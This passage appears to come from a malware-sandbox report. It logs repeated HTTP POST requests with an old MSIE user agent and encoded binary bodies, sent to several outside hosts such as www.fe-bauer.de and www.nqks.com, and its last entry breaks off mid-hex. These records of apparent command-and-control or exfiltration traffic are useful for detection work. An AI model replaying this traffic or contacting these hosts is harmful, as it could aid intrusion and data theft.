RuxjE5IKlWUjSW1pRah4z5WZcFTiuZeV5qnw0T4lQey5lRoNm/hRU4NaibU4Htz5b8TTRgYqho5QHNJABxS7ydAAuylU3QpDbQknGM9WbLuDwJT4M8hxENDD0DguVD+eVzD9XyMPGTyTu0R+0fW/5lnOCXh2l6L5+S6yZF6QRSW8e400sJNpU27yb1M0TmDtIuJXCmwcZgRx9T4AQL9r6Wt19Jw3CF0PP7g8YtE3iV4e29hZEiNpr+emSjXsYUFBMIMKwmJX9YvQ1vVwoPBnAXaZsFNYyDhyanqvbUUB5d5Fr5FDoF2VEn0QkLqLtHXkU/EV7G7dfOrnWV8ay8uM5p00aP91gAYoqrTRg0vTtjeiA8NblsInYGEBGutabSjiOR5oaK9Cl3hpVyHjv4FPdrDLkQQMSVMlp3YVcHA/KosYTVsTyde48JeBNftlfBZP8ivbeMUqIYkMpkNQlcUns4xEGS3W8YWmigJKsY3OAVJXSU6YyuHtlQtpBQePZtcx6o4dKT0jQffMIgvhQ3+JQMIItX6lW4emiefPkAQkt6iRy8e6SnozCPzeFvQbN+cTS1QwwT8p89I4
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nqks.comCache-Control: no-cacheData Raw: 4e 48 77 70 76 39 72 75 6f 6d 57 2f 41 41 44 69 2f 66 41 70 70 42 30 74 5a 73 50 4b 46 79 42 35 72 76 62 54 30 46 32 52 59 64 44 6b 70 55 52 63 4a 63 73 58 77 58 34 6b 4c 6d 66 37 69 50 6b 52 69 62 4f 37 63 67 2b 4d 41 4d 67 32 45 52 2f 43 31 49 67 6c 62 45 2b 7a 64 4b 33 6b 56 45 61 36 6b 42 44 2b 48 71 72 57 61 70 65 56 6e 53 73 35 6c 64 35 4d 44 4b 55 54 59 4d 6c 55 30 66 6b 52 58 73 32 31 65 30 72 63 4d 61 69 76 2b 55 36 32 68 6e 49 61 48 41 48 37 34 78 51 68 61 53 59 58 73 68 68 73 34 45 37 7a 48 6d 6e 7a 76 41 4f 75 2b 45 71 53 64 31 39 72 69 76 5a 43 6e 74 65 36 6a 63 70 6b 36 65 31 30 79 36 77 30 36 6b 55 69 57 73 4a 35 71 4e 4c 41 32 4e 77 61 64 7a 36 59 47 6a 4b 66 45 31 36 43 43 69 6a 43 36 46 41 41 59 48 70 41 69 58 62 37 31 39 72 47 32 41 47 35 37 6f 61 6c 39 72 43 6e 4a 47 61 33 42 33 66 52 63 7a 72 68 4b 69 61 42 2b 37 6f 6b 5a 65 2b 2f 70 6b 34 4f 59 58 56 42 47 57 46 61 61 51 66 61 33 45 4a 43 4e 53 77 67 50 50 62 70 72 50 30 63 59 48 32 61 43 39 52 65 58 70 47 6a 58 78 38 64 35 69 49 4a 50 33 42 56 30 78 2b 61 71 62 56 31 4d 50 34 68 2f 78 67 2f 6a 76 58 31 35 6b 49 39 6b 72 38 51 52 42 57 6c 73 4b 30 71 39 62 62 4b 6f 74 76 5a 4f 49 2b 7a 6c 71 78 34 76 6f 4d 52 66 75 56 42 52 46 6e 61 46 4c 61 78 73 77 4f 42 48 37 65 42 53 79 46 43 37 58 4f 6a 6f 4c 4d 6b 30 75 61 45 73 67 55 63 47 72 48 79 6e 66 46 61 41 39 57 38 70 62 67 4f 67 51 35 7a 55 4c 32 38 54 30 50 65 4c 54 44 72 4f 79 42 6a 2f 6b 39 50 59 52 43 2f 39 76 69 47 4b 73 35 4e 37 54 75 36 35 47 54 32 6b 56 73 39 6d 4e 30 70 78 71 46 4c 38 6e 4e 4a 47 74 4d 75 6a 43 4b 4c 54 59 77 36 43 70 34 72 2b 63 49 3d Data Ascii: NHwpv9ruomW/AADi/fAppB0tZsPKFyB5rvbT0F2RYdDkpURcJcsXwX4kLmf7iPkRibO7cg+MAMg2ER/C1IglbE+zdK3kVEa6kBD+HqrWapeVnSs5ld5MDKUTYMlU0fkRXs21e0rcMaiv+U62hnIaHAH74xQhaSYXshhs4E7zHmnzvAOu+EqSd19rivZCnte6jcpk6e10y6w06kUiWsJ5qNLA2Nwadz6YGjKfE16CCijC6FAAYHpAiXb719rG2AG57oal9rCnJGa3B3fRczrhKiaB+7okZe+/pk4OYXVBGWFaaQfa3EJCNSwgPPbprP0cYH2aC9ReXpGjXx8d5iIJP3BV0x+aqbV1MP4h/xg/jvX15kI9kr8QRBWlsK0q9bbKotvZOI+zlqx4voMRfuVBRFnaFLaxswOBH7eBSyFC7XOjoLMk0uaEsgUcGrHynfFaA9W8pbgOgQ5zUL28T0PeLTDrOyBj/k9PYRC/9viGKs5N7Tu65GT2kVs9mN0pxqFL8nNJGtMujCKLTYw6Cp4r+cI=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.c9dd.comCache-Control: no-cacheData Raw: 4a 63 67 37 41 41 56 63 72 57 57 49 42 6a 45 4d 4c 4a 31 6a 64 58 36 32 36 30 66 54 33 37 68 74 43 56 47 50 57 35 62 37 76 71 52 4b 4e 31 32 4a 66 4c 31 66 4a 52 4d 36 31 33 59 38 37 59 34 49 55 2b 36 58 61 6e 45 47 47 52 62 34 4c 59 2b 55 69 6f 62 2f 48 31 39 50 72 68 5a 2f 76 71 30 69 4e 50 61 63 4c 78 61 51 32 58 68 53 55 62 54 4f 47 44 43 66 4f 43 49 79 75 72 44 74 48 2b 64 51 36 30 34 41 31 59 5a 31 57 34 58 37 74 63 6f 49 70 47 47 55 58 64 66 74 2b 4e 39 4f 73 6a 50 67 35 57 47 4c 6b 6f 4b 66 4b 34 6e 66 36 6d 75 4a 44 5a 77 74 58 6a 32 45 73 7a 51 62 46 62 54 4c 5a 77 76 33 73 4b 61 4a 52 7a 55 4d 30 51 45 70 69 68 7a 30 38 6e 64 61 5a 6f 78 41 33 2b 4e 65 56 54 72 66 6f 39 51 32 34 72 48 6d 5a 61 39 64 30 57 43 35 45 45 76 51 45 4d 33 64 37 44 54 59 49 52 44 52 64 6d 56 39 37 38 5a 36 69 79 33 47 69 77 47 41 6f 38 64 59 62 64 76 39 7a 68 35 2b 52 55 50 61 6a 4f 41 64 4e 6e 38 4f 36 4f 64 72 76 73 61 73 32 57 36 6d 62 4e 43 77 67 73 38 43 72 78 6d 6e 6c 59 69 6b 58 52 69 45 6a 59 66 55 39 46 4e 63 5a 38 73 52 45 32 54 36 4d 68 7a 71 6b 50 72 43 31 58 62 70 75 69 6c 35 44 4c 62 6e 45 79 6b 46 4f 57 30 6a 36 61 56 4b 2b 54 50 33 6e 2b 41 2b 49 76 32 52 53 4b 35 54 35 35 49 54 43 47 5a 45 30 69 57 46 59 7a 52 65 70 41 62 2b 31 43 38 4c 71 30 38 71 70 34 51 76 46 33 6b 61 6f 51 59 34 4c 78 42 44 2f 65 43 2b 35 61 34 41 67 4b 65 48 58 36 56 47 30 42 49 79 4d 77 6c 52 4a 6a 6a 61 47 6e 5a 53 54 65 4c 51 2b 2f 32 67 54 44 37 4d 44 6b 4c 58 67 35 50 79 7a 35 68 68 51 43 39 30 36 45 4d 46 6e 6e 32 46 79 34 44 74 4e 39 55 74 71 45 39 64 62 63 4e 54 6c 48 51 6a 66 69 46 48 47 70 67 61 37 69 42 54 66 68 6a 5a 70 78 30 43 44 4b 47 47 5a 67 35 51 53 77 65 42 41 2f 72 57 6c 71 6d 33 59 72 5a 6a 4d 7a 6d 4e 73 78 77 78 68 31 41 6c 39 44 32 79 48 46 76 50 6f 79 6f 4c Data Ascii: Jcg7AAVcrWWIBjEMLJ1jdX6260fT37htCVGPW5b7vqRKN12JfL1fJRM613Y87Y4IU+6XanEGGRb4LY+Uiob/H19PrhZ/vq0iNPacLxaQ2XhSUbTOGDCfOCIyurDtH+dQ604A1YZ1W4X7tcoIpGGUXdft+N9OsjPg5WGLkoKfK4nf6muJDZwtXj2EszQbFbTLZwv3sKaJRzUM0QEpihz08ndaZoxA3+NeVTrfo9Q24rHmZa9d0WC5EEvQEM3d7DTYIRDRdmV978Z6iy3GiwGAo8dYbdv9zh5+RUPajOAdNn8O6Odrvsas2W6mbNCwgs8CrxmnlYikXRiEjYfU9FNcZ8sRE2T6MhzqkPrC1Xbpuil5DLbnEykFOW0j6aVK+TP3n+A+Iv2RSK5T55ITCGZE0iWFYzRepAb+1C8Lq08qp4QvF3kaoQY4LxBD/eC+5a4AgKeHX6VG0BIyMwlRJjjaGnZSTeLQ+/2gTD7MDkLXg5Pyz5hhQC906EMFnn2Fy4DtN9UtqE9dbcNTlHQjfiFHGpga7iBTfhjZpx0CDKGGZg5QSweBA/rWlqm3YrZjMzmNsxwxh1Al9D2yHFvPoyoL
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jchysk.comCache-Control: no-cacheData Raw: 54 69 73 72 76 2b 62 75 6f 6d 55 69 58 4e 4e 2f 67 62 6c 61 70 51 6d 46 43 74 72 47 6c 6f 79 77 65 6f 6d 4b 51 68 76 30 4c 74 51 70 61 74 46 6a 41 47 38 50 76 42 30 56 50 44 49 44 4d 74 33 67 50 67 50 6f 7a 55 6e 7a 51 71 31 51 55 55 56 6c 76 64 4f 6b 4c 75 6a 67 4d 74 71 78 4e 31 5a 46 70 56 45 73 61 61 4f 4b 62 33 70 67 7a 7a 54 4e 74 2b 32 61 4b 51 67 55 4e 31 4d 6b 6e 6c 41 66 69 46 4c 43 35 4a 47 62 32 77 63 47 53 7a 58 54 73 2b 51 62 52 36 32 65 58 63 5a 6d 76 53 30 49 67 73 55 37 57 59 53 34 59 4a 52 53 30 76 6c 38 62 49 79 4d 46 68 42 76 49 6c 62 55 33 67 32 31 2b 5a 4d 68 41 64 45 71 4b 71 56 33 54 49 67 4c 73 58 38 6a 68 6d 55 76 71 66 49 61 44 76 61 4c 32 44 39 67 63 36 33 75 52 46 70 58 67 43 74 49 34 39 36 38 48 58 50 67 79 2f 48 75 68 69 61 65 54 71 65 64 6a 32 33 50 2f 37 57 58 38 34 41 39 42 41 2f 54 79 4e 4d 68 74 64 62 49 57 4a 61 71 2f 6c 63 72 4b 49 75 74 56 7a 6a 49 72 4a 32 57 6b 61 79 6c 48 57 2f 58 6b 6b 72 4d 69 68 39 37 2f 42 2f 73 6f 75 6e 72 35 6d 70 77 6c 41 43 68 70 4a 55 52 47 44 68 6d 6a 33 56 77 43 67 32 74 48 2b 4c 74 38 4d 66 6d 5a 33 6e 50 4a 69 64 56 36 4c 56 6c 69 34 69 61 39 5a 63 53 34 78 35 49 68 53 6f 6a 6b 38 76 53 32 39 39 42 49 44 68 4a 4d 77 74 68 6b 51 79 5a 69 44 45 42 59 44 31 58 35 6e 79 77 54 66 59 76 76 6d 4f 76 67 54 68 4a 36 43 2f 72 5a 31 4a 79 56 4e 6b 34 35 76 78 30 4e 78 70 59 41 36 57 64 43 39 62 58 34 63 71 7a 4e 6e 53 69 4c 35 64 39 63 34 38 76 51 79 6e 73 5a 75 71 76 63 33 53 4f 34 79 71 67 73 4a 6a 68 77 49 69 71 62 46 6f 34 34 7a 73 32 43 6a 5a 33 41 4b 2b 58 5a 44 43 30 63 5a 42 6c 38 46 56 72 79 4d 45 35 6a 37 4f 64 69 75 5a 64 38 59 44 6a 6d 41 6f 37 75 50 78 5a 34 71 53 66 2b 52 41 41 62 70 64 6d 43 75 76 79 41 74 30 3d Data Ascii: Tisrv+buomUiXNN/gblapQmFCtrGloyweomKQhv0LtQpatFjAG8PvB0VPDIDMt3gPgPozUnzQq1QUUVlvdOkLujgMtqxN1ZFpVEsaaOKb3pgzzTNt+2aKQgUN1MknlAfiFLC5JGb2wcGSzXTs+QbR62eXcZmvS0IgsU7WYS4YJRS0vl8bIyMFhBvIlbU3g21+ZMhAdEqKqV3TIgLsX8jhmUvqfIaDvaL2D9gc63uRFpXgCtI4968HXPgy/HuhiaeTqedj23P/7WX84A9BA/TyNMhtdbIWJaq/lcrKIutVzjIrJ2WkaylHW/XkkrMih97/B/sounr5mpwlAChpJURGDhmj3VwCg2tH+Lt8MfmZ3nPJidV6LVli4ia9ZcS4x5IhSojk8vS299BIDhJMwthkQyZiDEBYD1X5nywTfYvvmOvgThJ6C/rZ1JyVNk45vx0NxpYA6WdC9bX4cqzNnSiL5d9c48vQynsZuqvc3SO4yqgsJjhwIiqbFo44zs2CjZ3AK+XZDC0cZBl8FVryME5j7OdiuZd8YDjmAo7uPxZ4qSf+RAAbpdmCuvyAt0=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 47 45 62 63 38 48 38 73 74 57 58 66 48 7a 56 76 58 73 2f 44 37 67 67 76 73 4b 7a 56 75 6a 4f 5a 49 34 54 46 51 49 46 31 55 6e 51 79 63 43 2f 43 64 47 51 32 47 49 39 6e 46 69 63 41 52 38 4e 78 45 4b 2f 4b 73 68 34 70 66 73 6c 6d 59 64 77 73 50 67 36 35 6b 6c 31 41 7a 34 4e 77 69 77 5a 41 33 33 58 32 33 43 53 34 70 46 31 43 4b 48 59 73 31 6b 55 66 5a 6d 57 47 75 45 6f 39 64 5a 73 74 72 6f 52 68 77 39 58 69 72 4d 77 67 35 58 7a 38 4a 48 35 53 45 32 34 7a 30 56 6f 39 58 48 74 49 48 75 2f 4a 7a 4c 61 48 34 54 55 74 47 75 65 77 32 68 77 46 63 56 78 74 35 44 31 7a 7a 31 39 58 74 35 48 4e 30 64 35 33 38 47 5a 6e 79 30 49 44 49 46 37 46 6d 76 65 58 48 62 50 61 45 45 4c 4d 64 41 6a 6a 44 75 6d 63 4a 44 47 2f 51 7a 57 63 50 43 77 4b 4d 4f 39 30 4a 75 43 4d 4b 6e 78 4c 42 45 65 59 4d 38 67 34 43 54 7a 74 65 4c 67 5a 32 58 54 49 33 37 30 74 6f 2f 56 64 4b 79 73 31 4d 6b 4d 50 66 6b 53 30 65 4c 56 2f 59 75 66 63 4c 57 70 37 43 70 49 6c 6a 33 66 78 43 69 61 4d 4e 47 38 52 41 31 43 4c 56 58 61 33 65 65 43 68 71 64 7a 76 7a 6f 36 33 4d 47 57 6d 79 34 32 6e 35 52 5a 51 63 72 49 63 6e 35 76 39 57 35 47 58 4a 4e 42 73 57 32 46 6c 6c 31 39 44 4a 77 39 49 4a 7a 45 34 6a 66 4f 45 76 76 46 50 34 4a 51 45 36 30 55 47 62 4c 4a 4a 61 50 46 52 62 47 70 30 53 44 75 75 4a 65 48 5a 65 78 4e 41 65 39 58 6f 7a 45 6f 6f 58 42 78 77 30 63 4b 56 7a 79 75 62 4d 38 6a 72 74 67 48 61 72 35 6f 67 2b 73 45 41 44 63 2f 59 69 5a 4c 61 34 76 4c 38 2f 76 72 79 57 44 5a 73 45 34 37 74 71 36 44 2b 6f 4a 74 4d 72 51 58 67 4b 5a 42 59 75 63 68 32 51 32 75 2b 63 33 75 75 45 6f 55 57 68 54 52 59 54 75 58 45 33 6d 57 61 70 73 6d 59 48 5a 72 46 4b 6b 64 74 4d 54 46 4b 44 31 4f 4e 68 37 50 49 4f 39 64 2b 5a 67 3d 3d Data Ascii: GEbc8H8stWXfHzVvXs/D7ggvsKzVujOZI4TFQIF1UnQycC/CdGQ2GI9nFicAR8NxEK/Ksh4pfslmYdwsPg65kl1Az4NwiwZA33X23CS4pF1CKHYs1kUfZmWGuEo9dZstroRhw9XirMwg5Xz8JH5SE24z0Vo9XHtIHu/JzLaH4TUtGuew2hwFcVxt5D1zz19Xt5HN0d538GZny0IDIF7FmveXHbPaEELMdAjjDumcJDG/QzWcPCwKMO90JuCMKnxLBEeYM8g4CTzteLgZ2XTI370to/VdKys1MkMPfkS0eLV/YufcLWp7CpIlj3fxCiaMNG8RA1CLVXa3eeChqdzvzo63MGWmy42n5RZQcrIcn5v9W5GXJNBsW2Fll19DJw9IJzE4jfOEvvFP4JQE60UGbLJJaPFRbGp0SDuuJeHZexNAe9XozEooXBxw0cKVzyubM8jrtgHar5og+sEADc/YiZLa4vL8/vryWDZsE47tq6D+oJtMrQXgKZBYuch2Q2u+c3uuEoUWhTRYTuXE3mWapsmYHZrFKkdtMTFKD1ONh7PIO9d+Zg==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 47 45 62 63 38 48 38 73 74 57 58 66 48 7a 56 76 58 73 2f 44 37 67 67 76 73 4b 7a 56 75 6a 4f 5a 49 34 54 46 51 49 46 31 55 6e 51 79 63 43 2f 43 64 47 51 32 47 49 39 6e 46 69 63 41 52 38 4e 78 45 4b 2f 4b 73 68 34 70 66 73 6c 6d 59 64 77 73 50 67 36 35 6b 6c 31 41 7a 34 4e 77 69 77 5a 41 33 33 58 32 33 43 53 34 70 46 31 43 4b 48 59 73 31 6b 55 66 5a 6d 57 47 75 45 6f 39 64 5a 73 74 72 6f 52 68 77 39 58 69 72 4d 77 67 35 58 7a 38 4a 48 35 53 45 32 34 7a 30 56 6f 39 58 48 74 49 48 75 2f 4a 7a 4c 61 48 34 54 55 74 47 75 65 77 32 68 77 46 63 56 78 74 35 44 31 7a 7a 31 39 58 74 35 48 4e 30 64 35 33 38 47 5a 6e 79 30 49 44 49 46 37 46 6d 76 65 58 48 62 50 61 45 45 4c 4d 64 41 6a 6a 44 75 6d 63 4a 44 47 2f 51 7a 57 63 50 43 77 4b 4d 4f 39 30 4a 75 43 4d 4b 6e 78 4c 42 45 65 59 4d 38 67 34 43 54 7a 74 65 4c 67 5a 32 58 54 49 33 37 30 74 6f 2f 56 64 4b 79 73 31 4d 6b 4d 50 66 6b 53 30 65 4c 56 2f 59 75 66 63 4c 57 70 37 43 70 49 6c 6a 33 66 78 43 69 61 4d 4e 47 38 52 41 31 43 4c 56 58 61 33 65 65 43 68 71 64 7a 76 7a 6f 36 33 4d 47 57 6d 79 34 32 6e 35 52 5a 51 63 72 49 63 6e 35 76 39 57 35 47 58 4a 4e 42 73 57 32 46 6c 6c 31 39 44 4a 77 39 49 4a 7a 45 34 6a 66 4f 45 76 76 46 50 34 4a 51 45 36 30 55 47 62 4c 4a 4a 61 50 46 52 62 47 70 30 53 44 75 75 4a 65 48 5a 65 78 4e 41 65 39 58 6f 7a 45 6f 6f 58 42 78 77 30 63 4b 56 7a 79 75 62 4d 38 6a 72 74 67 48 61 72 35 6f 67 2b 73 45 41 44 63 2f 59 69 5a 4c 61 34 76 4c 38 2f 76 72 79 57 44 5a 73 45 34 37 74 71 36 44 2b 6f 4a 74 4d 72 51 58 67 4b 5a 42 59 75 63 68 32 51 32 75 2b 63 33 75 75 45 6f 55 57 68 54 52 59 54 75 58 45 33 6d 57 61 70 73 6d 59 48 5a 72 46 4b 6b 64 74 4d 54 46 4b 44 31 4f 4e 68 37 50 49 4f 39 64 2b 5a 67 3d 3d Data Ascii: GEbc8H8stWXfHzVvXs/D7ggvsKzVujOZI4TFQIF1UnQycC/CdGQ2GI9nFicAR8NxEK/Ksh4pfslmYdwsPg65kl1Az4NwiwZA33X23CS4pF1CKHYs1kUfZmWGuEo9dZstroRhw9XirMwg5Xz8JH5SE24z0Vo9XHtIHu/JzLaH4TUtGuew2hwFcVxt5D1zz19Xt5HN0d538GZny0IDIF7FmveXHbPaEELMdAjjDumcJDG/QzWcPCwKMO90JuCMKnxLBEeYM8g4CTzteLgZ2XTI370to/VdKys1MkMPfkS0eLV/YufcLWp7CpIlj3fxCiaMNG8RA1CLVXa3eeChqdzvzo63MGWmy42n5RZQcrIcn5v9W5GXJNBsW2Fll19DJw9IJzE4jfOEvvFP4JQE60UGbLJJaPFRbGp0SDuuJeHZexNAe9XozEooXBxw0cKVzyubM8jrtgHar5og+sEADc/YiZLa4vL8/vryWDZsE47tq6D+oJtMrQXgKZBYuch2Q2u+c3uuEoUWhTRYTuXE3mWapsmYHZrFKkdtMTFKD1ONh7PIO9d+Zg==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 47 45 62 63 38 48 38 73 74 57 58 66 48 7a 56 76 58 73 2f 44 37 67 67 76 73 4b 7a 56 75 6a 4f 5a 49 34 54 46 51 49 46 31 55 6e 51 79 63 43 2f 43 64 47 51 32 47 49 39 6e 46 69 63 41 52 38 4e 78 45 4b 2f 4b 73 68 34 70 66 73 6c 6d 59 64 77 73 50 67 36 35 6b 6c 31 41 7a 34 4e 77 69 77 5a 41 33 33 58 32 33 43 53 34 70 46 31 43 4b 48 59 73 31 6b 55 66 5a 6d 57 47 75 45 6f 39 64 5a 73 74 72 6f 52 68 77 39 58 69 72 4d 77 67 35 58 7a 38 4a 48 35 53 45 32 34 7a 30 56 6f 39 58 48 74 49 48 75 2f 4a 7a 4c 61 48 34 54 55 74 47 75 65 77 32 68 77 46 63 56 78 74 35 44 31 7a 7a 31 39 58 74 35 48 4e 30 64 35 33 38 47 5a 6e 79 30 49 44 49 46 37 46 6d 76 65 58 48 62 50 61 45 45 4c 4d 64 41 6a 6a 44 75 6d 63 4a 44 47 2f 51 7a 57 63 50 43 77 4b 4d 4f 39 30 4a 75 43 4d 4b 6e 78 4c 42 45 65 59 4d 38 67 34 43 54 7a 74 65 4c 67 5a 32 58 54 49 33 37 30 74 6f 2f 56 64 4b 79 73 31 4d 6b 4d 50 66 6b 53 30 65 4c 56 2f 59 75 66 63 4c 57 70 37 43 70 49 6c 6a 33 66 78 43 69 61 4d 4e 47 38 52 41 31 43 4c 56 58 61 33 65 65 43 68 71 64 7a 76 7a 6f 36 33 4d 47 57 6d 79 34 32 6e 35 52 5a 51 63 72 49 63 6e 35 76 39 57 35 47 58 4a 4e 42 73 57 32 46 6c 6c 31 39 44 4a 77 39 49 4a 7a 45 34 6a 66 4f 45 76 76 46 50 34 4a 51 45 36 30 55 47 62 4c 4a 4a 61 50 46 52 62 47 70 30 53 44 75 75 4a 65 48 5a 65 78 4e 41 65 39 58 6f 7a 45 6f 6f 58 42 78 77 30 63 4b 56 7a 79 75 62 4d 38 6a 72 74 67 48 61 72 35 6f 67 2b 73 45 41 44 63 2f 59 69 5a 4c 61 34 76 4c 38 2f 76 72 79 57 44 5a 73 45 34 37 74 71 36 44 2b 6f 4a 74 4d 72 51 58 67 4b 5a 42 59 75 63 68 32 51 32 75 2b 63 33 75 75 45 6f 55 57 68 54 52 59 54 75 58 45 33 6d 57 61 70 73 6d 59 48 5a 72 46 4b 6b 64 74 4d 54 46 4b 44 31 4f 4e 68 37 50 49 4f 39 64 2b 5a 67 3d 3d Data Ascii: GEbc8H8stWXfHzVvXs/D7ggvsKzVujOZI4TFQIF1UnQycC/CdGQ2GI9nFicAR8NxEK/Ksh4pfslmYdwsPg65kl1Az4NwiwZA33X23CS4pF1CKHYs1kUfZmWGuEo9dZstroRhw9XirMwg5Xz8JH5SE24z0Vo9XHtIHu/JzLaH4TUtGuew2hwFcVxt5D1zz19Xt5HN0d538GZny0IDIF7FmveXHbPaEELMdAjjDumcJDG/QzWcPCwKMO90JuCMKnxLBEeYM8g4CTzteLgZ2XTI370to/VdKys1MkMPfkS0eLV/YufcLWp7CpIlj3fxCiaMNG8RA1CLVXa3eeChqdzvzo63MGWmy42n5RZQcrIcn5v9W5GXJNBsW2Fll19DJw9IJzE4jfOEvvFP4JQE60UGbLJJaPFRbGp0SDuuJeHZexNAe9XozEooXBxw0cKVzyubM8jrtgHar5og+sEADc/YiZLa4vL8/vryWDZsE47tq6D+oJtMrQXgKZBYuch2Q2u+c3uuEoUWhTRYTuXE3mWapsmYHZrFKkdtMTFKD1ONh7PIO9d+Zg==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mobilnic.netCache-Control: no-cacheData Raw: 58 46 45 73 46 42 45 52 6c 57 55 2b 4c 31 68 2b 73 4a 64 32 64 47 71 4c 6b 69 76 50 35 78 4e 42 31 66 44 58 59 4f 47 68 4f 41 56 47 47 6a 41 66 69 42 79 65 62 78 65 45 34 65 35 69 5a 54 32 76 71 49 50 6f 6f 33 61 4d 37 34 67 5a 44 62 75 4c 4e 45 56 69 57 47 4e 39 75 74 72 67 6a 4f 2b 50 6b 7a 73 77 33 76 4d 30 78 31 7a 75 4d 77 76 39 39 6a 6a 56 7a 76 4d 42 44 6f 67 34 2b 31 45 77 49 74 52 75 2b 36 76 2b 7a 67 2b 49 4a 4f 55 76 49 67 69 73 38 64 74 32 6d 4e 44 4d 51 6b 75 30 66 51 6b 61 43 61 78 2b 42 45 75 6b 42 49 6f 64 6f 35 62 46 2f 39 51 38 31 36 58 46 78 30 63 43 63 55 5a 66 6d 6d 6d 71 6f 70 48 5a 51 54 65 50 57 49 6c 78 64 2b 50 39 47 6f 30 4c 63 4c 65 35 6c 7a 31 4a 30 79 61 65 57 4a 64 7a 6c 6c 55 52 42 68 72 4c 55 35 72 58 77 52 41 50 46 37 54 49 56 57 77 36 47 48 59 77 68 4b 52 55 38 51 36 71 45 66 58 54 36 2b 6b 6e 43 4e 66 36 57 68 2f 39 76 6a 76 31 6b 4a 74 63 55 52 4e 46 78 77 41 34 4f 37 45 58 71 79 50 2f 79 79 56 4b 74 4b 41 73 2f 61 63 55 79 52 4a 42 63 72 70 48 74 74 45 68 71 73 68 44 52 41 77 63 50 6a 41 41 5a 51 63 7a 36 39 6a 36 42 31 44 69 61 6a 58 43 47 77 2b 7a 69 45 61 74 59 42 6d 49 35 6a 4d 4a 59 7a 6b 4f 75 63 62 70 76 35 6a 37 32 50 6f 51 59 63 64 67 63 35 44 50 2b 50 36 77 47 78 38 77 31 6d 35 32 7a 59 49 6f 4b 57 39 4e 76 45 62 77 37 57 56 72 59 6f 2b 32 62 58 38 49 4f 35 39 67 67 2f 50 72 2f 47 30 41 46 44 62 73 6b 53 30 77 37 49 4f 6a 49 65 47 45 2f 6b 2b 67 72 41 74 6f 55 64 7a 47 68 57 4a 34 4b 61 69 57 64 34 65 5a 76 59 53 54 41 61 68 6d 55 77 33 58 6e 4b 55 32 47 41 36 54 66 6b 66 53 6f 2b 39 55 4b 78 35 59 70 4b 76 74 63 57 44 4c 35 4d 48 66 4c 6e 33 4a 74 51 34 44 74 53 4b 34 75 6c 52 53 65 68 62 59 32 75 41 67 64 46 7a 6d 64 72 6d 46 4f 39 4d 52 79 43 2f 4a Data Ascii: XFEsFBERlWU+L1h+sJd2dGqLkivP5xNB1fDXYOGhOAVGGjAfiByebxeE4e5iZT2vqIPoo3aM74gZDbuLNEViWGN9utrgjO+Pkzsw3vM0x1zuMwv99jjVzvMBDog4+1EwItRu+6v+zg+IJOUvIgis8dt2mNDMQku0fQkaCax+BEukBIodo5bF/9Q816XFx0cCcUZfmmmqopHZQTePWIlxd+P9Go0LcLe5lz1J0yaeWJdzllURBhrLU5rXwRAPF7TIVWw6GHYwhKRU8Q6qEfXT6+knCNf6Wh/9vjv1kJtcURNFxwA4O7EXqyP/yyVKtKAs/acUyRJBcrpHttEhqshDRAwcPjAAZQcz69j6B1DiajXCGw+ziEatYBmI5jMJYzkOucbpv5j72PoQYcdgc5DP+P6wGx8w1m52zYIoKW9NvEbw7WVrYo+2bX8IO59gg/Pr/G0AFDbskS0w7IOjIeGE/k+grAtoUdzGhWJ4KaiWd4eZvYSTAahmUw3XnKU2GA6TfkfSo+9UKx5YpKvtcWDL5MHfLn3JtQ4DtSK4ulRSehbY2uAgdFzmdrmFO9MRyC/J
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 47 45 62 63 38 48 38 73 74 57 58 66 48 7a 56 76 58 73 2f 44 37 67 67 76 73 4b 7a 56 75 6a 4f 5a 49 34 54 46 51 49 46 31 55 6e 51 79 63 43 2f 43 64 47 51 32 47 49 39 6e 46 69 63 41 52 38 4e 78 45 4b 2f 4b 73 68 34 70 66 73 6c 6d 59 64 77 73 50 67 36 35 6b 6c 31 41 7a 34 4e 77 69 77 5a 41 33 33 58 32 33 43 53 34 70 46 31 43 4b 48 59 73 31 6b 55 66 5a 6d 57 47 75 45 6f 39 64 5a 73 74 72 6f 52 68 77 39 58 69 72 4d 77 67 35 58 7a 38 4a 48 35 53 45 32 34 7a 30 56 6f 39 58 48 74 49 48 75 2f 4a 7a 4c 61 48 34 54 55 74 47 75 65 77 32 68 77 46 63 56 78 74 35 44 31 7a 7a 31 39 58 74 35 48 4e 30 64 35 33 38 47 5a 6e 79 30 49 44 49 46 37 46 6d 76 65 58 48 62 50 61 45 45 4c 4d 64 41 6a 6a 44 75 6d 63 4a 44 47 2f 51 7a 57 63 50 43 77 4b 4d 4f 39 30 4a 75 43 4d 4b 6e 78 4c 42 45 65 59 4d 38 67 34 43 54 7a 74 65 